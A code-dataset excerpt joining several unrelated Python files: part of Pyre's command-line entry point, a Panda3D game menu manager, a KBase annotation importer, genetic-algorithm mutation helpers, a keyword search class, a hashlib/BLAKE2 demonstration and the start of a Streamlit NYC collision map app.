Collects troubleshooting diagnostics for Pyre, and writes this information to\n the terminal.\n \"\"\",\n )\n rage.set_defaults(command=commands.Rage)\n\n check = parsed_commands.add_parser(\n commands.Check.NAME,\n epilog=\"\"\"\n Runs a one-time check of a project without initializing a type check server.\n \"\"\",\n )\n check.set_defaults(command=commands.Check)\n\n color = parsed_commands.add_parser(commands.Color.NAME)\n color.add_argument(\"path\")\n color.set_defaults(command=commands.Color)\n\n deobfuscate = parsed_commands.add_parser(commands.Deobfuscate.NAME)\n\n deobfuscate.set_defaults(command=commands.Deobfuscate)\n\n analyze = parsed_commands.add_parser(commands.Analyze.NAME)\n analyze.set_defaults(command=commands.Analyze)\n analyze.add_argument(\n \"analysis\", nargs=\"?\", default=\"taint\", help=\"Type of analysis to run: {taint}\"\n )\n analyze.add_argument(\n \"--taint-models-path\",\n action=\"append\",\n default=[],\n type=readable_directory,\n help=\"Location of taint models\",\n )\n analyze.add_argument(\n \"--no-verify\",\n action=\"store_true\",\n help=\"Do not verify models for the taint analysis.\",\n )\n analyze.add_argument(\n \"--save-results-to\",\n default=None,\n type=writable_directory,\n help=\"Directory to write analysis results to.\",\n )\n analyze.add_argument(\"--dump-call-graph\", action=\"store_true\")\n analyze.add_argument(\"--repository-root\", type=os.path.abspath)\n analyze.add_argument(\"--rule\", action=\"append\", type=int)\n\n persistent = parsed_commands.add_parser(\n commands.Persistent.NAME,\n epilog=\"\"\"\n Entry point for IDE integration to Pyre. 
Communicates with a\n Pyre server using the Language Server Protocol, accepts input from stdin and\n writing diagnostics and responses from the Pyre server to stdout.\n \"\"\",\n )\n persistent.add_argument(\n \"--no-watchman\",\n action=\"store_true\",\n help=\"Do not spawn a watchman client in the background.\",\n )\n persistent.set_defaults(command=commands.Persistent, noninteractive=True)\n\n start = parsed_commands.add_parser(\n commands.Start.NAME, epilog=\"Starts a pyre server as a daemon.\"\n )\n start.add_argument(\n \"--terminal\", action=\"store_true\", help=\"Run the server in the terminal.\"\n )\n start.add_argument(\n \"--store-type-check-resolution\",\n action=\"store_true\",\n help=\"Store extra information for `types` queries.\",\n )\n start.add_argument(\n \"--no-watchman\",\n action=\"store_true\",\n help=\"Do not spawn a watchman client in the background.\",\n )\n start.add_argument(\n \"--incremental-style\",\n type=IncrementalStyle,\n choices=list(IncrementalStyle),\n default=IncrementalStyle.SHALLOW,\n help=\"How to approach doing incremental checks.\",\n )\n start.set_defaults(command=commands.Start)\n\n stop = parsed_commands.add_parser(\n commands.Stop.NAME, epilog=\"Signals the Pyre server to stop.\"\n )\n stop.set_defaults(command=commands.Stop)\n\n restart = parsed_commands.add_parser(\n commands.Restart.NAME,\n epilog=\"Restarts a server. Equivalent to `pyre stop && pyre start`.\",\n )\n restart.add_argument(\n \"--terminal\", action=\"store_true\", help=\"Run the server in the terminal.\"\n )\n restart.add_argument(\n \"--store-type-check-resolution\",\n action=\"store_true\",\n help=\"Store extra information for `types` queries.\",\n )\n restart.add_argument(\n \"--no-watchman\",\n action=\"store_true\",\n help=\"Do not spawn a watchman client in the background.\",\n )\n restart.add_argument(\n \"--incremental-style\",\n type=IncrementalStyle,\n choices=list(IncrementalStyle),\n default=IncrementalStyle.SHALLOW,\n help=\"How to approach doing incremental checks.\",\n )\n restart.set_defaults(command=commands.Restart)\n\n kill = parsed_commands.add_parser(commands.Kill.NAME)\n kill.add_argument(\n \"--with-fire\", action=\"store_true\", help=\"Adds emphasis to the command.\"\n )\n kill.set_defaults(command=commands.Kill)\n\n initialize = parsed_commands.add_parser(commands.Initialize.NAME, aliases=[\"init\"])\n initialize.add_argument(\n \"--local\",\n action=\"store_true\",\n help=\"Initializes a local configuration in a project subdirectory.\",\n )\n initialize.set_defaults(command=commands.Initialize)\n\n query_message = \"\"\"\n `https://pyre-check.org/docs/querying-pyre.html` contains examples and documentation\n for this command, which queries a running pyre server for type, function and\n attribute information.\n\n To get a full list of queries, you can run `pyre query help`.\n \"\"\"\n query = parsed_commands.add_parser(commands.Query.NAME, epilog=query_message)\n query_argument_message = \"\"\"\n `pyre query help` will give a full list of available queries for the running Pyre.\n Example: `pyre query \"superclasses(int)\"`.\n \"\"\"\n query.add_argument(\"query\", help=query_argument_message)\n query.set_defaults(command=commands.Query)\n\n infer = parsed_commands.add_parser(commands.Infer.NAME)\n infer.add_argument(\n \"-p\",\n \"--print-only\",\n action=\"store_true\",\n help=\"Print raw JSON errors to standard output, \"\n + \"without converting to stubs or annnotating.\",\n )\n infer.add_argument(\n \"-f\",\n \"--full-only\",\n 
action=\"store_true\",\n help=\"Only output fully annotated functions. Requires infer flag.\",\n )\n infer.add_argument(\n \"-r\",\n \"--recursive\",\n action=\"store_true\",\n help=\"Recursively run infer until no new annotations are generated.\"\n + \" Requires infer flag.\",\n )\n infer.add_argument(\n \"-i\",\n \"--in-place\",\n nargs=\"*\",\n metavar=\"path\",\n type=file_exists,\n help=\"Add annotations to functions in selected paths.\"\n + \" Takes a set of files and folders to add annotations to.\"\n + \" If no paths are given, all functions are annotated.\"\n + \" WARNING: Modifies original files and requires infer flag and retype\",\n )\n infer.add_argument(\n \"--json\",\n action=\"store_true\",\n help=\"Accept JSON input instead of running full check.\",\n )\n infer.add_argument(\n \"--annotate-from-existing-stubs\",\n action=\"store_true\",\n help=\"Add annotations from existing stubs.\",\n )\n infer.add_argument(\n \"--debug-infer\",\n action=\"store_true\",\n help=\"Print error message when file fails to annotate.\",\n )\n infer.set_defaults(command=commands.Infer)\n\n statistics = parsed_commands.add_parser(commands.Statistics.NAME)\n statistics.add_argument(\n \"filter_paths\",\n nargs=\"*\",\n type=file_exists,\n help=\"Source path(s) to gather metrics for.\",\n )\n statistics.set_defaults(command=commands.Statistics)\n\n profile = parsed_commands.add_parser(commands.Profile.NAME)\n profile.add_argument(\n \"--output\",\n type=ProfileOutput,\n choices=ProfileOutput,\n help=\"Specify what to output.\",\n default=ProfileOutput.COLD_START_PHASES,\n )\n profile.set_defaults(command=commands.Profile)\n\n arguments = parser.parse_args()\n\n if not hasattr(arguments, \"command\"):\n if shutil.which(\"watchman\"):\n # pyre-fixme[16]: `Namespace` has no attribute `command`.\n arguments.command = commands.Incremental\n # pyre-fixme[16]: `Namespace` has no attribute `nonblocking`.\n arguments.nonblocking = False\n # pyre-fixme[16]: `Namespace` has no attribute `transitive`.\n arguments.incremental_style = IncrementalStyle.SHALLOW\n else:\n watchman_link = \"https://facebook.github.io/watchman/docs/install.html\"\n LOG.warning(\n \"No watchman binary found. 
\\n\"\n \"To enable pyre incremental, \"\n \"you can install watchman: {}\".format(watchman_link)\n )\n LOG.warning(\"Defaulting to non-incremental check.\")\n arguments.command = commands.Check\n\n configuration = None\n analysis_directory = None\n # Having this as a fails-by-default helps flag unexpected exit\n # from exception flows.\n exit_code = ExitCode.FAILURE\n start = time.time()\n try:\n # pyre-fixme[16]: `Namespace` has no attribute `capable_terminal`.\n arguments.capable_terminal = is_capable_terminal()\n if arguments.debug or not arguments.capable_terminal:\n # pyre-fixme[16]: `Namespace` has no attribute `noninteractive`.\n arguments.noninteractive = True\n\n switch_root(arguments)\n translate_arguments(commands, arguments)\n find_log_directory(arguments)\n log.initialize(arguments)\n\n if arguments.command in [commands.Initialize]:\n analysis_directory = AnalysisDirectory(\".\")\n else:\n if arguments.version:\n binary_version = get_binary_version_from_file(\n arguments.local_configuration\n )\n log.stdout.write(\n \"binary version: {}\\nclient version: {}\".format(\n binary_version, __version__\n )\n )\n return ExitCode.SUCCESS\n configuration = Configuration(\n local_configuration=arguments.local_configuration,\n search_path=arguments.search_path,\n binary=arguments.binary,\n typeshed=arguments.typeshed,\n preserve_pythonpath=arguments.preserve_pythonpath,\n excludes=arguments.exclude,\n logger=arguments.logger,\n formatter=arguments.formatter,\n log_directory=arguments.log_directory,\n )\n if configuration.disabled:\n LOG.log(\n log.SUCCESS, \"Pyre will not run due to being explicitly disabled\"\n )\n return ExitCode.SUCCESS\n\n if arguments.command in [commands.Kill]:\n analysis_directory = AnalysisDirectory(\".\")\n else:\n isolate = (\n arguments.command in [commands.Analyze, commands.Check]\n and not arguments.use_global_shared_analysis_directory\n )\n analysis_directory = resolve_analysis_directory(\n arguments, commands, configuration, isolate=isolate\n )\n\n command = arguments.command\n exit_code = (\n command(arguments, configuration, analysis_directory).run().exit_code()\n )\n except buck.BuckException as error:\n LOG.error(str(error))\n if arguments.command == commands.Persistent:\n commands.Persistent.run_null_server(timeout=3600 * 12)\n exit_code = ExitCode.BUCK_ERROR\n except EnvironmentException as error:\n LOG.error(str(error))\n if arguments.command == commands.Persistent:\n commands.Persistent.run_null_server(timeout=3600 * 12)\n exit_code = ExitCode.FAILURE\n except commands.ClientException as error:\n LOG.error(str(error))\n exit_code = ExitCode.FAILURE\n except Exception as error:\n LOG.error(str(error))\n LOG.info(traceback.format_exc())\n exit_code = ExitCode.FAILURE\n except KeyboardInterrupt:\n LOG.warning(\"Interrupted by user\")\n LOG.debug(traceback.format_exc())\n exit_code = ExitCode.SUCCESS\n finally:\n log.cleanup(arguments)\n if analysis_directory:\n analysis_directory.cleanup()\n if configuration and configuration.logger:\n log_statistics(\n \"perfpipe_pyre_usage\",\n arguments=arguments,\n configuration=configuration,\n integers={\n \"exit_code\": exit_code,\n \"runtime\": int((time.time() - start) * 1000),\n },\n normals={\"cwd\": os.getcwd(), \"client_version\": __version__},\n )\n\n return exit_code\n\n\nif __name__ == \"__main__\":\n try:\n os.getcwd()\n except FileNotFoundError:\n LOG.error(\n \"Pyre could not determine the current working directory. 
\"\n \"Has it been removed?\\nExiting.\"\n )\n sys.exit(ExitCode.FAILURE)\n sys.exit(main())\n","sub_path":"client/pyre.py","file_name":"pyre.py","file_ext":"py","file_size_in_byte":21965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"9416634","text":"'''\nCreated on Jun 27, 2010\n\n@author: Angus\n'''\nimport CConfig \n\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.showbase.DirectObject import DirectObject\nimport sys, time\nfrom direct.fsm.FSM import FSM\nfrom pandac.PandaModules import Vec3\nfrom pandac.PandaModules import *\nfrom direct.interval.IntervalGlobal import *\n \nfrom CLevel import CLevel\nfrom CGUI import Picker2D, MouseCursor\nfrom CInput import CInput\nfrom CJointedSprite import CJointedSprite\nfrom CSound import CSound\nfrom CStats import CStats\nfrom CAgent import CAgent\nfrom direct.gui.DirectGui import *\n\nfrom panda3d.core import ClockObject\n \nclass CAppRoot(ShowBase):\n \"\"\"\n An application class that should be setting many of the defaults for creating a 2D Application.\n \"\"\"\n def __init__(self):\n \n \"\"\"\n Initiation function for Application2D class.\n Calls ShowBase init as well.\n \"\"\"\n ShowBase.__init__(self)\n\n #Custom Config settings\n #Exit on Escape Key\n if CConfig.exitOnEscape:\n self.accept(\"escape\", sys.exit)\n #Mouse + Keys Camera Control\n if CConfig.trackballCamControl:\n self.useTrackball()\n else:\n self.disableMouse()\n if CConfig.driveCamControl:\n self.useDrive() \n \n \n #self.accept('i', PStatClient.connect) \n \n base.mouseWatcherNode.setModifierButtons(ModifierButtons())\n base.buttonThrowers[0].node().setModifierButtons(ModifierButtons()) \n \n base.camera.setY(-60)\n base.camera.setZ(20)\n \n self.gameManager = GameManager()\n \nclass GameManager(FSM, DirectObject):\n \n def __init__(self):\n FSM.__init__(self, 'GameManager')\n self.picker2D = Picker2D()\n self.cursor = MouseCursor()\n self.inputSystem = CInput()\n self.sound = CSound()\n self.level = None\n \n self.paused = False\n self.accept('t', self.test)\n self.accept('o', self.request, ['Menu'])\n #self.accept('l', self.request, ['Game', 'WelcomeBack/demo_1'])\n self.accept('l', self.request, ['Game', 'testLevel4/testLevel4'])\n \n \n self.accept('EndpointReached', self.request, ['StatsMenu'])\n \n #self.request('Game', 'WelcomeBack/demo_1')\n self.request('Menu')\n \n def test(self):\n CAgent.Agents[0].reparentTo(render)\n CAgent.Agents[0].setPos(-16.42868,-12.342829)\n CAgent.Agents[0].playAnim('walk', loop=True)\n \n def pauseLevel(self):\n if self.paused == False:\n self.paused = True\n self.request('PauseMenu')\n else:\n self.paused = False\n self.request('Game')\n \n def enterGame(self, levelFile = None):\n if self.level == None:\n self.myFrame = DirectFrame(frameColor=(0, 0, 0, 1), frameSize=(-2, 2, -2, 2))\n self.myFrame.setBin('fixed', 40)\n self.myFrame.setPos(0, 0, 0)\n \n self.title = OnscreenImage(pos = (0.2, 0, 0), scale=(1.3,1,0.7), image='Loading.png')\n self.title.setTransparency(TransparencyAttrib.MAlpha)\n self.title.reparentTo(self.myFrame)\n self.cursor.mouseCursor.node.hide()\n \n for i in range(2):\n base.graphicsEngine.renderFrame()\n time.sleep(0.1)\n self.level = CLevel(levelFile)\n \n self.accept('escape', self.pauseLevel)\n self.myFrame.destroy()\n self.cursor.mouseCursor.node.show()\n #self.sound.FadeOutIn(self.sound.m_StreetTheme)\n def exitGame(self):\n if not self.paused:\n self.ignore('escape')\n self.level.closeLevel()\n del self.level\n self.level = None\n\n 
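# Editor's note: these handlers follow Panda3D's FSM naming convention --\n # self.request('X') calls exit<Current>() and then enter<X>(), so for example\n # self.request('PauseMenu') below runs exitGame() followed by enterPauseMenu().\n 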
def enterPauseMenu(self):\n self.level.pauseLevel()\n self.myFrame = DirectFrame(frameColor=(0, 0, 0, 0.25), frameSize=(-2, 2, -2, 2))\n self.myFrame.setBin('fixed', 40)\n self.myFrame.setPos(0, 0, 0)\n \n self.btnMenuResume = DirectButton(text = \"\", scale=(0.6,0.5,0.5), command=self.pauseLevel, frameColor=(0,0,0,0), image='Resume.png')\n self.btnMenuResume['image_scale'] = (1,1,1)\n self.btnMenuResume.setPos(0, 0, 0.25)\n self.btnMenuResume.reparentTo(self.myFrame)\n self.btnMenuResume.setTransparency(TransparencyAttrib.MAlpha)\n \n self.btnMenuQuit = DirectButton(text = \"\", scale=(0.45,0.5,0.35), command=exit, frameColor=(0,0,0,0), image='Quit.png')\n self.btnMenuQuit.setPos(0, 0, -0.45)\n self.btnMenuQuit['image_scale'] = (1,1,1)\n self.btnMenuQuit.reparentTo(self.myFrame)\n self.btnMenuQuit.setTransparency(TransparencyAttrib.MAlpha)\n \n def exitPauseMenu(self):\n self.myFrame.destroy()\n self.level.resumeLevel() \n \n def enterMenu(self):\n self.sound.FadeOutIn(self.sound.m_MenuTheme)\n self.myFrame = DirectFrame(frameColor=(0, 0, 0, 1), frameSize=(-2, 2, -2, 2))\n self.myFrame.setBin('fixed', 40)\n self.myFrame.setPos(0, 0, 0)\n \n self.btnMenuPlay = DirectButton(text = \"\", scale=(0.45,0.5,0.35), command=self.request, frameColor=(0,0,0,255), image='Play.png', extraArgs=['Game', 'Welcome Back/WelcomeBack'])\n self.btnMenuPlay['image_scale'] = (1.15,1,1.15)\n self.btnMenuPlay.setPos(-0.4, 0, -0.45)\n self.btnMenuPlay.reparentTo(self.myFrame)\n self.btnMenuPlay.setTransparency(TransparencyAttrib.MAlpha)\n \n self.btnMenuQuit = DirectButton(text = \"\", scale=(0.45,0.5,0.35), command=exit, frameColor=(0,0,0,255), image='Quit.png')\n self.btnMenuQuit.setPos(0.4, 0, -0.45)\n self.btnMenuQuit['image_scale'] = (1.15,1,1.15)\n self.btnMenuQuit.reparentTo(self.myFrame)\n self.btnMenuQuit.setTransparency(TransparencyAttrib.MAlpha)\n \n self.title = OnscreenImage(pos = (0, 0, 0.2), scale=(1.3,1,0.7), image='Title.png')\n self.title.setTransparency(TransparencyAttrib.MAlpha)\n \n self.title.reparentTo(self.myFrame)\n pass\n \n def exitMenu(self):\n self.myFrame.destroy()\n #self.sound.FadeOutSound(soundType = 'MenuTheme')\n\n def enterStatsMenu(self):\n self.sound.FadeOutIn(self.sound.m_StatsTheme)\n CStats.showStats()\n self.accept('space', self.request, ['Menu'])\n \n def exitStatsMenu(self):\n self.ignore('space')\n CStats.unshowStats()","sub_path":"src/CAppRoot.py","file_name":"CAppRoot.py","file_ext":"py","file_size_in_byte":6557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"117953156","text":"# import sys\nimport os\nimport datetime\nimport logging\nimport json\nimport uuid\n\nfrom installed_clients.WorkspaceClient import Workspace as Workspace\nfrom installed_clients.KBaseReportClient import KBaseReport\n#from installed_clients.annotation_ontology_apiServiceClient import annotation_ontology_api\nfrom installed_clients.cb_annotation_ontology_apiClient import cb_annotation_ontology_api\n\nimport MergeMetabolicAnnotations.utils.functions as f\n\n\nclass ImportAnnotationsUtil:\n\n def __init__(self, config):\n self.config = config\n self.timestamp = datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")\n self.callback_url = config['SDK_CALLBACK_URL']\n self.scratch = config['scratch']\n self.ws_client = Workspace(config[\"workspace-url\"])\n # self.anno_api = annotation_ontology_api()\n self.anno_api = cb_annotation_ontology_api(self.callback_url) # ,token=self.token\n self.kbr = KBaseReport(self.callback_url)\n\n def run(self, 
ctx, params):\n\n ontology = f.df_to_ontology(params)\n with open(os.path.join(self.scratch, \"ontology_before_api.json\"), 'w') as outfile:\n json.dump(ontology, outfile, indent=2)\n\n add_ontology_results = self.anno_api.add_annotation_ontology_events({\n \"input_ref\": params['genome'],\n \"output_name\": params['output_name'],\n \"input_workspace\": params['workspace_name'],\n \"workspace-url\": self.config[\"workspace-url\"],\n \"events\": ontology,\n \"timestamp\": self.timestamp,\n \"output_workspace\": params['workspace_name'],\n \"save\": 1\n })\n\n # get the new list of events to make a table\n get_ontology_results = self.anno_api.get_annotation_ontology_events({\n \"input_ref\": add_ontology_results['output_ref'],\n \"workspace-url\": self.config[\"workspace-url\"]\n })\n\n ontology_selected = f.filter_selected_ontologies(\n get_ontology_results, params, workflow=\"unique\")\n with open(os.path.join(self.scratch, \"get_ontology_dump.json\"), 'w') as outfile:\n json.dump(ontology_selected, outfile, indent=2)\n\n # make report\n html_reports = []\n output_directory = os.path.join(self.scratch, str(uuid.uuid4()))\n os.mkdir(output_directory)\n\n html_reports.append(f.html_add_ontology_summary(\n params, ontology, add_ontology_results, output_directory))\n event_summary = f.get_event_lists(ontology_selected)\n html_reports = f.compare_report_stack(html_reports, event_summary, output_directory)\n\n # finalize html reports\n report_params = {\n 'message': '',\n 'html_links': html_reports,\n 'direct_html_link_index': 0,\n 'objects_created': [{'ref': add_ontology_results[\"output_ref\"], 'description': 'Genome with imported annotations'}],\n 'workspace_name': params['workspace_name'],\n 'report_object_name': f'import_annotations_{uuid.uuid4()}'}\n\n report_output = self.kbr.create_extended_report(report_params)\n\n return {'output_genome_ref': add_ontology_results[\"output_ref\"],\n 'report_name': report_output['name'],\n 'report_ref': report_output['ref']}\n","sub_path":"lib/MergeMetabolicAnnotations/utils/ImportAnnotationsUtil.py","file_name":"ImportAnnotationsUtil.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"50949291","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 27 16:19:09 2021\n\n@author: utente\n\"\"\"\n\nfrom random import randint, sample, uniform\nfrom numpy.random import randn\n\n\ndef geometric_mutation(individual, constant_ms, evolution_step):\n \"\"\"Geometric mutation for snake Individual\n\n Args:\n individual (Individual): A GA individual from call_snake library.py\n\n Returns:\n Individual: mutated Individual\n \"\"\"\n # decay constant_ms as the evolution step grows\n constant_ms = constant_ms / (evolution_step + 1)\n # We iterate over the weights (matrix, array, matrix, array)\n for matrix in individual:\n \n if len(matrix.shape) > 1: #check if we are handling a matrix\n for i in range(matrix.shape[0]): #we iterate over the matrix\n for j in range(matrix.shape[1]):\n shift = uniform(-constant_ms, constant_ms) #we select the shift in the interval\n matrix[i,j] += shift\n \n else: #otherwise we are handling an array\n for i in range(len(matrix)): #iterate over array\n shift = uniform(-constant_ms, constant_ms)\n matrix[i] += shift \n \n return individual\n \n \n\ndef normal_distribution_mutation(individual):\n \"\"\" Mutation for snake Individual calculating the shift with a standard normal distribution\n\n Args:\n individual (Individual): A GA individual from call_snake library.py\n\n Returns:\n Individual: mutated Individual\n \"\"\"\n # copy the parent's weights array by array, so the parent is not mutated in place\n weights = [matrix.copy() for matrix in individual.weights]\n #We iterate over the weights (matrix, array, matrix, array) \n for idx, matrix in enumerate(weights):\n \n if idx == 0 or idx == 2: #check if we are handling a matrix\n for i in range(matrix.shape[0]): #we iterate over the matrix\n for j in range(matrix.shape[1]):\n shift = randn() #we draw the shift from a standard normal distribution\n matrix[i,j] += shift\n \n else: #otherwise we are handling an array\n for i in range(len(matrix)): #iterate over array\n shift = randn()\n matrix[i] += shift\n \n return weights\n \n ","sub_path":"past_versions/Henrique/Trial2_DF/snake_mutation.py","file_name":"snake_mutation.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"162201129","text":"from db.database_handlers import *\n\nclass SearchEngine:\n def __init__(self):\n self.video_counts = []\n self.part_counts = []\n\n def search_in_text(self, wanted, text):\n wanted_keywords = wanted.split(' ')\n split_text = text.split(' ')\n count = 0\n for t in split_text:\n for wk in wanted_keywords:\n if not (wk == 'of' or wk == 'and' or wk == 'but' or wk == 'or' or wk == 'nor' or wk == 'so' or wk == 'for' or wk == 'yet'):\n if wk == t:\n count += 1\n return count\n\n def search_in_keywords(self, wanted, keyword_list):\n wanted_keywords = wanted.split(' ')\n count = 0\n for keyword in keyword_list:\n for wk in wanted_keywords:\n if not (wk == 'of' or wk == 'and' or wk == 'but' or wk == 'or' or wk == 'nor' or wk == 'so' or wk == 'for' or wk == 'yet'):\n if wk == keyword:\n count += 1\n return count\n\n def select_video_most_related(self, wanted):\n self.calculate_video_counts(wanted)\n self.video_counts = sorted(self.video_counts, key=lambda x: x[1], reverse=True)\n\n def select_part_most_related(self, wanted):\n self.calculate_part_counts(wanted)\n self.part_counts = sorted(self.part_counts, key=lambda x: x[2], reverse=True)\n\n def parts_of_video(self, video_id, parts):\n parts_of_curr_video = []\n for part in parts:\n if part['video_id'] == video_id:\n parts_of_curr_video.append(part)\n return parts_of_curr_video\n\n def calculate_video_counts(self, wanted):\n parts = db.select_all_from_table_dic('parts')\n videos = db.select_all_from_table_dic('video')\n video_ids = []\n for video in videos:\n video_ids.append(video['video_id'])\n videoCounts = []\n video_count = 0\n curr_video_index = 0\n parts_of_curr_video = []\n for video in video_ids:\n parts_of_curr_video = self.parts_of_video(str(video), parts)\n for part in parts_of_curr_video:\n video_count += self.search_in_text(wanted, part['text'])\n videoCounts.append([video, video_count])\n video_count = 0\n self.video_counts = videoCounts\n return videoCounts\n\n def calculate_part_counts(self, wanted):\n parts = db.select_all_from_table_dic('parts')\n videos = db.select_all_from_table_dic('video')\n partCounts = []\n for part in parts:\n partCounts.append([part['video_id'], part['part_id'], self.search_in_text(wanted, part['text'])])\n self.part_counts = partCounts\n return partCounts\n","sub_path":"flask_module/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"118672153","text":"import hashlib\nfrom hashlib import shake_128\nfrom hashlib import blake2b\n\nimport hmac\n\n# 
https://docs.python.org/3.7/library/hashlib.html#module-hashlib\n\ndef test_hash_basic():\n\n print('hashlib.algorithms_guaranteed : ', hashlib.algorithms_guaranteed)\n\n print('hashlib.algorithms_available : ', hashlib.algorithms_available)\n\n m = hashlib.sha256()\n\n # Update the hash object with the bytes-like object. \n # Repeated calls are equivalent to a single call with the concatenation of all the arguments: m.update(a); \n # m.update(b) is equivalent to m.update(a+b).\n m.update(b\"Nobody inspects\")\n m.update(b' the spammish repetition')\n\n # digest, Return the digest of the data passed to the update() method so far. \n # This is a bytes object of size digest_size which may contain bytes in the whole range from 0 to 255.\n c = m.digest()\n print('digest : ', c)\n\n print('hash name : ', m.name)\n print('digest size : ', m.digest_size)\n print('block size : ', m.block_size)\n\n # Return a copy (“clone”) of the hash object. This can be used to efficiently compute the digests of data sharing a common initial substring.\n new_hash_obj = m.copy()\n\n print('sha224 hash : ', hashlib.sha224(b\"Nobody inspects the spammish repetition\").hexdigest())\n\n\n # hashlib.new(name[, data])\n # Is a generic constructor that takes the string name of the desired algorithm as its first parameter. \n # It also exists to allow access to the above listed hashes as well as any other algorithms that your OpenSSL library may offer. \n # The named constructors are much faster than new() and should be preferred.\n h = hashlib.new('ripemd160')\n h.update(b'Nobody inspects the spammish repetition')\n print('ripemd160 hash : ', h.hexdigest())\n\n\ndef test_hash_shake_basic():\n\n # The shake_128() and shake_256() algorithms provide variable length digests with length_in_bits//2 up to 128 or 256 bits of security. \n # As such, their digest methods require a length. Maximum length is not limited by the SHAKE algorithm.\n # Note: digest() must be called on a hash object, not on the bare constructor.\n shake_128(b'Nobody inspects the spammish repetition').digest(156)\n\ndef test_hash_blake():\n h = blake2b()\n h.update(b'Hello world')\n print('hex digest : ', h.hexdigest())\n\n print(\"blake2 hex digest : \", blake2b(b'Hello world').hexdigest())\n\n h1 = blake2b(key=b'key-to-encrypt') # blake2b keys must be bytes, not str\n items = [b'Hello', b' ', b'World']\n for item in items:\n h1.update(item)\n print('blake2 update hex digest : ', h1.hexdigest())\n\n h2 = blake2b(digest_size=20)\n h2.update(b'Hello world')\n print(\"blake2 size20 digest: \", h2.hexdigest())\n print(\"digest size \", h2.digest_size)\n print(\"length of digest \", len(h2.digest()))\n\n\ndef test_keyed_hash():\n # Keyed hashing\n # Keyed hashing can be used for authentication as a faster and simpler replacement for Hash-based message authentication code (HMAC). 
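A minimal\n # side-by-side sketch (editor's addition; the key and message values are illustrative):\n #   blake2b(b'message', key=b'secret').hexdigest()               # keyed BLAKE2\n #   hmac.new(b'secret', b'message', hashlib.blake2b).hexdigest() # HMAC construction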
\n # BLAKE2 can be securely used in prefix-MAC mode thanks to the indifferentiability property inherited from BLAKE.\n h = blake2b(key=b'pseudorandom key', digest_size=16)\n h.update(b'message data')\n print('keyed hash code : ', h.hexdigest())\n\n # Even though there’s a native keyed hashing mode, BLAKE2 can, of course, be used in HMAC construction with hmac module:\n m = hmac.new(b'secret key', digestmod=hashlib.blake2s)\n m.update(b'message to send')\n print('keyed message ', m.hexdigest())\n\n\ndef test_hash_tree_mode():\n FANOUT = 2\n DEPTH = 2\n LEAF_SIZE = 4096\n INNER_SIZE = 64\n\n buf = bytearray(6000)\n\n h00 = blake2b(buf[0:LEAF_SIZE], fanout=FANOUT, depth=DEPTH,\n leaf_size = LEAF_SIZE, inner_size=INNER_SIZE,\n node_offset=0, node_depth=0, last_node=False)\n \n h01 = blake2b(buf[LEAF_SIZE:], fanout=FANOUT, depth=DEPTH,\n leaf_size=LEAF_SIZE, inner_size=INNER_SIZE,\n node_offset=1, node_depth=0, last_node=True)\n\n h10 = blake2b(digest_size=32, fanout=FANOUT, depth=DEPTH,\n leaf_size=LEAF_SIZE, inner_size=INNER_SIZE,\n node_offset=0, node_depth=1, last_node=True)\n \n h10.update(h00.digest())\n h10.update(h01.digest())\n c = h10.hexdigest()\n print('tree mode digest : ', c)\n\n\nif __name__ == '__main__':\n\n test_hash_basic()\n\n test_hash_shake_basic()\n\n test_keyed_hash()","sub_path":"Python35/App/HandleJWT/test_hashlib.py","file_name":"test_hashlib.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"12433378","text":"\n\"\"\"\nName: CASEY HEALEY\nCS602: Section 1\nData: NYC Collison Data\nURL: Link to your web application online (see extra credit)\nDescription:\nThe program is broken into two parts - \"MAP\" and \"BREAKDOWN\"\n\n\"MAP\"\nThis program takes NYC Collison data and creates a map that can be filtered by date.\nThe program also outputs the average number of deaths and injuries per accident in the specified timeframe\nand outputs a chart with the injuries and death breakdown for each borough, sorted by injuries\n\n\"BREAKDOWN\"\nThe program's second page uses matplotlib and seaborn to create two visualizations - users select a factor,\nborough and \"injured or killed\" and the output is a pie chart of 3 injured or killed groups\n(pedestrians, motorist and cyclists)\n\nAt the bottom, using seaborn, the program uses the same filtered data to generate\na boxplot of the vehicle type & persons injured/killed\n\nWhere I believe I meet the project requirements is also commented out\n\n\"\"\"\nimport numpy as np\nimport streamlit as st\nimport pandas as pd\nimport datetime\nfrom matplotlib import pyplot as plt\n#package not used during the semester\nimport seaborn as sns\nimport random\n\n\n@st.cache\ndef loaddata():\n df = pd.read_csv('database.csv')\n # The dataset contains a few values that are outside the range of NYC\n # The code below deletes the rows with errors\n df = df[df['LATITUDE'].values > 39]\n df = df[(df['LONGITUDE'].values > -75) & (df['LONGITUDE'].values < -72)]\n df['DATE'] = pd.to_datetime(df['DATE'])\n df = df[df['LATITUDE'].notna()]\n df = df[df['LONGITUDE'].notna()]\n df = df[df['BOROUGH'].notna()]\n # creates a dataframe with Date, Latitude and Longitude\n # drops null values for mapping\n return df\n\ndf = loaddata()\n\ndef accidents_map(df):\n #ZIPS 3 relevant columns into a dataframe\n locations = tuple(zip(df['DATE'], df['LATITUDE'], df['LONGITUDE']))\n location = pd.DataFrame(locations, columns=[\"Date\", \"lat\", \"lon\"])\n st.title(\"Accidents 
